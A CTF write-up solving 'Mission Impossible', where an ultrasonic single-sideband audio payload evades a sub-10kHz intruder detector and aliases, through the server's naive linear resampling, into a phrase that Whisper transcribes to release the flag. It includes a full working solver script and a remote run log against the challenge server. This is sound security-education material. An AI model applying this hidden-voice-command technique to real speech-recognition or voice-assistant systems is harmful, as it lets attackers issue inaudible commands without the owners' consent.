![[Pasted image 20251221024008.png]]

//TSG CTF – Mission Impossible (MISC)

Remote: http://35.194.98.181:57860/

Flag format: TSGCTF{...}

>TL;DR

The service runs Whisper speech-to-text, but it also has a broken “intruder detector” that triggers on any non-zero energy below 10kHz.
The key bug: it checks magnitude > 0 after cutting high-frequencies, so any low-frequency residue triggers ALERT!.
Solution: craft an audio signal with all energy above 10kHz (so detector sees exactly 0), but which still becomes intelligible to Whisper after the server’s naive linear resampling (res_type="linear") from a higher sample rate to 16kHz.
This is done by placing a speech signal in an ultrasonic band (single-sideband modulation), relying on aliasing during the downsample to fold it back into the speech band.

Final flag:

TSGCTF{Th1S_fl4g_wiLL_s3lf-deSTrucT_in_5_s3c0nds}

>1) Local analysis

1.1 Files

The attachment is a tiny tarball containing a Dockerized Gradio app.

Terminal transcript (local) (from local_analysis.log):

text


$ ls -la

(total listing omitted)

  

$ file -b mission_impossible.tar.gz

gzip compressed data, from Unix, original size modulo 2^32 10240

  

$ tar -xzvf mission_impossible.tar.gz -C extracted

mission_impossible/

mission_impossible/Dockerfile

mission_impossible/src/

mission_impossible/src/server.py

1.2 Reading the server

The core logic is in extracted/mission_impossible/src/server.py.

Key parts (verbatim):


def detect_intruder(freq_space, sr):

    cut_high_freqs(freq_space, sr, 10000)

    magnitude = np.abs(freq_space).max()

    return magnitude > 0

  

...

  

freq_space = librosa.stft(wave, n_fft=N_FFT)

freq_space[np.abs(freq_space) < 0.01] = 0

wave = librosa.istft(freq_space)

  

if detect_intruder(freq_space, sr):

    return "ALERT! Intruder detected!"

  

wave = librosa.resample(wave, orig_sr=sr, target_sr=WHISPER_SR, res_type="linear")

result = whisper.transcribe(model, wave, temperature=0.0)["text"]

if "give me the flag" in result.lower():

    return "OK, here is the flag: " + FLAG

1.3 What the bug means

detect_intruder() cuts high frequencies (everything above 10kHz), then computes magnitude = max(abs(freq_space)).
It returns magnitude > 0.

So the detector triggers if there is any non-zero STFT bin below 10kHz.

Because they already did a “noise cancellation” step:


freq_space[np.abs(freq_space) < 0.01] = 0

…we can aim to make all STFT bins under 10kHz exactly zero (after their thresholding), so magnitude == 0 and the detector does not fire.

1.4 Why “ultrasonic + aliasing” is the right idea

At first this sounds impossible: if we remove everything below 10kHz, Whisper can’t hear the phrase, right?

But note the order:

They compute STFT and threshold it.
They inverse-STFT back to wave.
They call detect_intruder(freq_space, sr) on the frequency domain copy.
If safe, they resample the time-domain wave to 16kHz using res_type="linear".

So:

We only need to ensure the STFT bins below 10kHz are 0 to bypass the detector.
The time-domain wave is still used for Whisper. If that wave contains ultrasonic information, and the resampling is naive, it can alias into the audible range.

This is a classic signal-processing pitfall:

Downsampling without a proper anti-alias low-pass filter folds high-frequency content into low frequencies.

That gave the core exploitation idea:

Encode the command phrase into an ultrasonic band (>10kHz). The detector sees 0 (because it removes those bins). Then the server’s naive resampling folds (aliases) that ultrasonic band back into the speech band, and Whisper transcribes it.

>2) Building the exploit locally

2.1 Tooling

I needed:

espeak-ng to synthesize “give me the flag” reproducibly
python libs for signal processing (numpy, scipy, soundfile, librosa)

(Installed in this environment with apt/pip.)

2.2 How the payload is constructed

Steps:

Synthesize a clean baseband speech waveform (WHISPER_SR=16000).
Low-pass it (≈4kHz) so it fits nicely inside a modulation bandwidth.
Upsample to 48kHz.
Perform single-sideband modulation (SSB) via the analytic signal (Hilbert transform):

[

x_{ssb}(t) = \Re{ (x(t) + j \hat{x}(t)) e^{j 2\pi f_c t} }

]

This shifts the speech spectrum up near a carrier frequency f_c (default ~16kHz).

Apply a strong high-pass filter (e.g. 13kHz) so any residual energy below 10kHz is eliminated.
Save as a standard PCM16 WAV.

2.3 Local verification (important)

Before even touching the remote, the solver emulates the server’s detection logic:

STFT (n_fft=400)
threshold bins < 0.01 to zero
cut frequencies above 10kHz and check magnitude

If the check returns exactly 0.0, we know the detector will not trigger.

>3) Remote exploitation

3.1 API discovery

The UI is Gradio, and it exposes endpoints under the prefix shown in /config:

api_prefix = /gradio_api

The reliable way (works even when gradio_client API-metadata is flaky) is to use:

POST /gradio_api/upload to upload the WAV
POST /gradio_api/run/predict with a FileData object referencing the uploaded server path

The solver does exactly this using httpx.

3.2 Successful remote run

Terminal transcript (remote) (from remote_run.log):

text


$ python3 solve_mission_impossible.py \

    --out attack2.wav \

    --mode ssb \

    --repeat 8 \

    --hp 13000 \

    --remote http://35.194.98.181:57860/

  

[+] Wrote: /home/noigel/CTF/tsg/MISC/Mission_Impossible/attack2.wav

[+] Intruder magnitude after cut (should be 0.0): 0.0

[+] Alias self-corr sanity (higher is better): 0.9999

[+] Attack RMS: 0.104154

[+] Aliased (LP) RMS: 0.073874

[+] Remote response:

OK, here is the flag: TSGCTF{Th1S_fl4g_wiLL_s3lf-deSTrucT_in_5_s3c0nds}

>4) Full solver code

File: solve_mission_impossible.py

python


#!/usr/bin/env python3

import argparse

import math

import os

import subprocess

import tempfile

from dataclasses import dataclass

from pathlib import Path

  

import numpy as np

import soundfile as sf

from scipy.signal import butter, filtfilt, hilbert

import librosa

  
  

def remote_run_predict(remote: str, wav_path: Path, timeout_s: float = 120.0) -> str:

    """Run the remote Gradio app via HTTP endpoints.

  

    Uses:

      - POST /gradio_api/upload

      - POST /gradio_api/run/predict

    """

    import httpx

  

    base = remote.rstrip("/")

    upload_url = f"{base}/gradio_api/upload"

    run_url = f"{base}/gradio_api/run/predict"

  

    with httpx.Client(timeout=timeout_s) as client:

        with wav_path.open("rb") as f:

            files = {"files": (wav_path.name, f, "audio/wav")}

            r = client.post(upload_url, files=files)

        r.raise_for_status()

        uploaded_path = r.json()[0]

  

        payload = {

            "data": [

                {

                    "path": uploaded_path,

                    "meta": {"_type": "gradio.FileData"},

                }

            ]

        }

        rr = client.post(run_url, json=payload)

        rr.raise_for_status()

        j = rr.json()

        return j.get("data", [""])[0]

  
  

N_FFT = 400

MAX_DURATION = 5

WHISPER_SR = 16000

  
  

@dataclass

class LocalCheckResult:

    intruder_magnitude_after_cut: float

    corr_base_vs_aliased: float

    base_rms: float

    attack_rms: float

  
  

def linear_resample(wave: np.ndarray, orig_sr: int, target_sr: int) -> np.ndarray:

    """Resample via linear interpolation (intentionally naive, to match the service)."""

    if orig_sr == target_sr:

        return wave.astype(np.float32, copy=False)

    if wave.ndim != 1:

        raise ValueError("linear_resample expects mono audio")

    if orig_sr <= 0 or target_sr <= 0:

        raise ValueError("Invalid sample rates")

  

    ratio = target_sr / float(orig_sr)

    out_len = max(1, int(round(len(wave) * ratio)))

    x_old = np.arange(len(wave), dtype=np.float32)

    x_new = np.linspace(0.0, float(len(wave) - 1), out_len, dtype=np.float32)

    return np.interp(x_new, x_old, wave.astype(np.float32, copy=False)).astype(np.float32, copy=False)

  
  

def _butter_filter(wave: np.ndarray, sr: int, kind: str, cutoff_hz: float, order: int = 6) -> np.ndarray:

    nyq = 0.5 * sr

    if cutoff_hz <= 0 or cutoff_hz >= nyq:

        raise ValueError(f"cutoff_hz must be within (0, {nyq})")

    w = cutoff_hz / nyq

    b, a = butter(order, w, btype=kind)

    return filtfilt(b, a, wave).astype(np.float32, copy=False)

  
  

def synthesize_phrase_espeak(phrase: str, out_wav: Path, sr: int = WHISPER_SR) -> None:

    out_wav.parent.mkdir(parents=True, exist_ok=True)

    cmd = [

        "espeak-ng",

        "-v",

        "en-us",

        "-s",

        "150",

        "-w",

        str(out_wav),

        phrase,

    ]

    subprocess.check_call(cmd)

    # espeak-ng chooses its own SR; normalize to requested.

    wave, in_sr = sf.read(out_wav, dtype="float32")

    if wave.ndim == 2:

        wave = wave.mean(axis=1)

    if in_sr != sr:

        wave = librosa.resample(wave, orig_sr=in_sr, target_sr=sr, res_type="kaiser_best")

        sf.write(out_wav, wave, sr)

  
  

def make_ultrasonic_attack(

    base_wave: np.ndarray,

    base_sr: int,

    attack_sr: int = 48000,

    base_lowpass_hz: float = 4000.0,

    carrier_hz: float = 16000.0,

    safety_highpass_hz: float = 10500.0,

    mode: str = "ssb",

) -> np.ndarray:

    if base_wave.ndim != 1:

        raise ValueError("base_wave must be mono")

    if base_sr <= 0 or attack_sr <= 0:

        raise ValueError("Invalid sample rates")

  

    # Trim to the service’s max duration.

    base_wave = base_wave[: int(MAX_DURATION * base_sr)].astype(np.float32, copy=False)

  

    # Band-limit so that, once shifted, everything stays above the 10k cutoff.

    base_wave = _butter_filter(base_wave, base_sr, "lowpass", base_lowpass_hz)

  

    # Upsample to a higher SR so we can place content in >10k.

    if base_sr != attack_sr:

        up = librosa.resample(base_wave, orig_sr=base_sr, target_sr=attack_sr, res_type="kaiser_best")

    else:

        up = base_wave

  

    t = np.arange(len(up), dtype=np.float32) / float(attack_sr)

    if mode == "ssb":

        # Single-sideband modulation via analytic signal to avoid creating a low-frequency image.

        analytic = hilbert(up).astype(np.complex64, copy=False)

        shifted = np.real(analytic * np.exp(1j * (2.0 * math.pi * carrier_hz) * t)).astype(np.float32)

    elif mode == "am":

        # AM modulation: creates symmetric sidebands around the carrier.

        carrier = np.cos((2.0 * math.pi * carrier_hz) * t).astype(np.float32)

        # Add a small bias so the envelope survives thresholding better.

        shifted = ((0.75 * up + 0.25) * carrier).astype(np.float32)

    else:

        raise ValueError("mode must be 'ssb' or 'am'")

  

    # Extra safety: remove any residual energy below cutoff.

    shifted = _butter_filter(shifted, attack_sr, "highpass", safety_highpass_hz)

  

    # Normalize.

    peak = float(np.max(np.abs(shifted)) + 1e-9)

    shifted = (0.95 * shifted / peak).astype(np.float32)

    return shifted

  
  

def server_like_local_check(attack_wave: np.ndarray, sr: int) -> LocalCheckResult:

    # Emulate key parts of server.py without Whisper.

    wave = attack_wave[: int(MAX_DURATION * sr)].astype(np.float32, copy=False)

  

    # Server STFT + threshold.

    freq_space = librosa.stft(wave, n_fft=N_FFT)

    freq_space[np.abs(freq_space) < 0.01] = 0

    denoised = librosa.istft(freq_space)

  

    # detect_intruder: cut high freqs then magnitude check.

    cutoff_bin = int(10000 * N_FFT / sr)

    freq_cut = freq_space.copy()

    if cutoff_bin < freq_cut.shape[0]:

        freq_cut[cutoff_bin:, :] = 0

    magnitude = float(np.abs(freq_cut).max())

  

    aliased = linear_resample(denoised.astype(np.float32, copy=False), orig_sr=sr, target_sr=WHISPER_SR)

    # Compare against an expected “baseband” reconstruction: the aliasing should recover speech-ish content.

    # We use self-correlation proxy by comparing aliased to its own lowpassed version (gives a sanity signal).

    aliased_lp = _butter_filter(aliased.astype(np.float32), WHISPER_SR, "lowpass", 4000.0)

  

    n = min(len(aliased), len(aliased_lp))

    a = aliased[:n]

    b = aliased_lp[:n]

    denom = float(np.linalg.norm(a) * np.linalg.norm(b) + 1e-9)

    corr = float(np.dot(a, b) / denom)

  

    return LocalCheckResult(

        intruder_magnitude_after_cut=magnitude,

        corr_base_vs_aliased=corr,

        base_rms=float(np.sqrt(np.mean(aliased_lp**2) + 1e-12)),

        attack_rms=float(np.sqrt(np.mean(wave**2) + 1e-12)),

    )

  
  

def write_int16_wav(path: Path, wave: np.ndarray, sr: int) -> None:

    path.parent.mkdir(parents=True, exist_ok=True)

    wave = np.clip(wave, -1.0, 1.0)

    sf.write(path, (wave * 32767.0).astype(np.int16), sr, subtype="PCM_16")

  
  

def main() -> int:

    ap = argparse.ArgumentParser(description="TSGCTF Mission Impossible solver (local-first).")

    ap.add_argument("--out", default="attack.wav", help="Output attack WAV file")

    ap.add_argument("--phrase", default="give me the flag", help="Command phrase")

    ap.add_argument("--attack-sr", type=int, default=48000, help="Attack WAV sample rate")

    ap.add_argument("--carrier", type=float, default=16000.0, help="Carrier frequency (Hz)")

    ap.add_argument("--hp", type=float, default=10500.0, help="High-pass cutoff (Hz) to keep energy >10k")

    ap.add_argument("--mode", choices=["ssb", "am"], default="ssb", help="Ultrasonic modulation mode")

    ap.add_argument("--repeat", type=int, default=3, help="Repeat phrase N times for better recognition")

    ap.add_argument("--remote", default=None, help="Remote Gradio URL (optional)")

    ap.add_argument("--remote-timeout", type=float, default=180.0, help="Remote request timeout in seconds")

    args = ap.parse_args()

  

    out_path = Path(args.out).resolve()

  

    with tempfile.TemporaryDirectory() as td:

        base_wav = Path(td) / "base.wav"

        phrase = (" ".join([args.phrase] * max(1, int(args.repeat)))).strip()

        synthesize_phrase_espeak(phrase, base_wav, sr=WHISPER_SR)

        base_wave, base_sr = sf.read(base_wav, dtype="float32")

        if base_wave.ndim == 2:

            base_wave = base_wave.mean(axis=1)

        base_wave = base_wave.astype(np.float32, copy=False)

  

        attack = make_ultrasonic_attack(

            base_wave,

            base_sr,

            attack_sr=args.attack_sr,

            carrier_hz=args.carrier,

            safety_highpass_hz=args.hp,

            mode=args.mode,

        )

        write_int16_wav(out_path, attack, args.attack_sr)

  

    check = server_like_local_check(attack, args.attack_sr)

    print("[+] Wrote:", out_path)

    print("[+] Intruder magnitude after cut (should be 0.0):", check.intruder_magnitude_after_cut)

    print("[+] Alias self-corr sanity (higher is better):", f"{check.corr_base_vs_aliased:.4f}")

    print("[+] Attack RMS:", f"{check.attack_rms:.6f}")

    print("[+] Aliased (LP) RMS:", f"{check.base_rms:.6f}")

  

    if args.remote:

        msg = remote_run_predict(args.remote, out_path, timeout_s=float(args.remote_timeout))

        print("[+] Remote response:")

        print(msg)

  

    return 0

  
  

if __name__ == "__main__":

    raise SystemExit(main())

>5) References / concepts used

These are the ideas this challenge relies on (and what I used to reason about it):

Nyquist–Shannon sampling theorem and aliasing (downsampling without proper anti-alias filtering):

- https://en.wikipedia.org/wiki/Nyquist%E2%80%93Shannon_sampling_theorem

- https://en.wikipedia.org/wiki/Aliasing

Hilbert transform / analytic signal (to build single-sideband modulation):

- https://en.wikipedia.org/wiki/Hilbert_transform

- https://en.wikipedia.org/wiki/Single-sideband_modulation

Gradio HTTP API endpoints (conceptually; the exact endpoints were confirmed from /config and /gradio_api/openapi.json):

- https://www.gradio.app/

>6) Notes / troubleshooting

If you get ALERT! Intruder detected!, your payload still has non-zero energy below 10kHz after their STFT thresholding. Increase --hp (e.g. 13000) and keep the signal normalized.
If you get Unknown command., Whisper didn’t recognize the phrase. Increase --repeat (I used 8) or try a different carrier.

>7) Reproduction checklist

From this folder:

bash


# Local-only generation + detector check

python3 solve_mission_impossible.py --out attack2.wav --mode ssb --repeat 8 --hp 13000

  

# Remote solve (prints flag)

python3 solve_mission_impossible.py --out attack2.wav --mode ssb --repeat 8 --hp 13000 --remote http://35.194.98.181:57860/